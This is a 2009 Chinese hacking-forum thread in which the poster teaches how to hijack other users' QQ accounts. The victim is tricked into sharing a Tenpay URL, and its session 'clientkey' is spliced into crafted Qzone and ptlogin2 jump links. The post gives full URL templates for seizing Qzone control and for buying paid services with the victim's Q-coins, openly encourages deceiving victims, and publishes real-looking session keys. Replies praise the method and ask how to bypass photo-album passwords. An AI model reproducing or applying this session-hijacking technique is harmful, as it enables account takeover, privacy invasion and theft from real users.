狩||猎||者 发表于 2009-3-3 14:11:31

你的QQ,我来管理(QQ漏洞应用)

此前我也曾写过这类的文章,也都有作过教程,不过都发在了其它的论坛上,呵呵,今天我就重新写一篇,教给大家一些黑客技术。

这个漏洞主要是应用腾讯网站的请求传递信息不严格,通过这个漏洞可以达到入侵其它QQ的QQ空间,QQ邮箱,赠送QQ钻。。。等一些QQ业务。这里的入侵别人的QQ空间是得到他的最高权限,当然他本人设置的任何密码权限通过这种方式对你来说都是没用的。不过这种方式有些被动,需要得到对方的网站网址。。这些平时我都是靠忽悠的,不知道你能不能行呢。。。呵呵。。。今天我就教给大家如何应用。

我先拿入侵别人的空间作例子。
需要得到对方QQ业务网站的网站。。最近我看了看,也只有QQ财富通可以得到这个了。。我们就是要对方点财富通这个QQ图标,相应的会出来个财富通网站,

http://969989691.free09.com.cn/原创所用图片/财富通1.JPG

       看到了吧,就是这个图标。

点这个图标会出来一个网站,我们就是要这个网站的网址。。

我拿我作例子。
我的网址是:
http://jump.tenpay.com/client.html?busid=15&clientuin=969989691&clientkey=B02FC5712E581586BD2886E01A1EC99299E047B2BB22A45E7CFC136772DE385D&ADUIN=969989691&ADSESSION=1236059062&ADTAG=CLIENT.QQ.1811_MyTip.10

这个网址当中就有我们要用的东西——key值!
也就是
B02FC5712E581586BD2886E01A1EC99299E047B2BB22A45E7CFC136772DE385D
这一系列加密后的六十四位密码

有了这个密码,可以说你就可以畅通无阻了。。
下面我讲一下如何应用。。。

我们要对这个key值进行一下加工,要可加入其它地址,变成我们想要的网址。。
我刚开始说我们要进他的空间,那我们就进行进入空间的处理。。

进入空间的网址经过我处理后是这样的。。
http://imgcache.qq.com/qzone/jump.html#zzpanelkey=key值&zzpaneluin=QQ号&url=http%3A%2F%2Fuser.qzone.qq.com%2FQQ号

好了,我们把我们得到的key值和对方的QQ号加进去。
http://imgcache.qq.com/qzone/jump.html#zzpanelkey=B02FC5712E581586BD2886E01A1EC99299E047B2BB22A45E7CFC136772DE385D&zzpaneluin=969989691&url=http%3A%2F%2Fuser.qzone.qq.com%2F969989691


好了,我们完成了,最后他空间的地址就是这个样子,我们只要打开这个网址,你就得到他的空间最高权限,他的空间你就可以任由你的处置了,呵呵。。。

对了,进空间还有另一个地址。。
http://imgcache.qq.com/qzone/jump.html#zzpanelkey=key值&zzpaneluin=QQ号&url=http%


这个比较简单些,呵呵。。

不过我有一点声明,这个key值不是每个人都可以用的,这个是每个QQ号一个值,也就是说我得到一个号的key值,但我后面加上另一个号的QQ号,这样是不行的,相应的值只能和相应的QQ一起用。并且不是永久的,应该是两三个小时就会改变。我想这两三个小时,他空间的密秘你也应该早就看完了,呵呵。。。

其它的QQ业务入侵同上。下面我把相应的地址发给大家,大家如果有哪里不明白的,跟贴提问或者发站内信给我,加我Q
Q也可以。

会员:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D1
红钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D3
黄钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D2
蓝钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D4
粉钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D6

绿钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D7

音紫钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D8

堂紫钻:
http://ptlogin2.qq.com/jump?clientuin=305086837&clientkey=DD89EBD05BD1D9106F4E4FF15B82CEF8975ADEC6A05077AA54B636A2A4DB73FD&u1=http%3A%2F%2Fpay.qq.com%2Fservice%2Fservice.shtml%3Fsid%3D5


以上地址,大家只要把key值和QQ号改成相应的值和号就可以进入了。如果对方有Q币你就可以给自己开业务了。。。
过一会我把我写的这个漏洞应用软件发给大家,以前也有写过,不过有几个bug,一会我改改就发上来.

好了,今天我就写到这,等待我的其它原创作品吧。。保正要你大开眼界,呵呵。。。




这种方法好像不行了。。。可能也是这几天才刚刚被TX给补上。。所以大家只要了解了这些就行。。呵呵。。
或许在有些浏览器是可以的。。

huli0528 发表于 2009-3-3 16:26:41

~~~无语了~~一个字~~强!!!!

王梦瑶 发表于 2009-3-3 17:52:22

学习了

cc5868969 发表于 2009-3-3 18:19:30

qiang    ........adas ada

w.wei 发表于 2009-3-3 20:06:20

LZ,前提是不是要忽悠对方来点我自己的财付通标志啊?但是他点了,网址他看得到,我自己看不到啊,继续忽悠他把网址发给我??嘿嘿~~明天去试试。感谢LZ分享~~支持原创~~

狩||猎||者 发表于 2009-3-3 20:58:07

你要得到的是他的那个网址,然后找到中间的那个值.再改空间网址就可以了..


还有如果哪位不明白跟贴问我...必会解答给大家...

yuyang 发表于 2009-3-3 21:56:36

谢谢楼主了,可是对方相册中有密码用什么样的方法能看到呢??

eng0119822009 发表于 2009-3-4 09:03:22

學習學習,感謝LZ的分享!~~支持原创~~等待你的其它原创作品.

网络侠客 发表于 2009-3-4 10:46:46

不错,学习一下黑客知识

鬼传说 发表于 2009-3-4 11:19:10

说什么好呢,有点淫荡来的贴切些,哈哈
页: [1] 2 3 4 5 6 7 8
查看完整版本: 你的QQ,我来管理(QQ漏洞应用)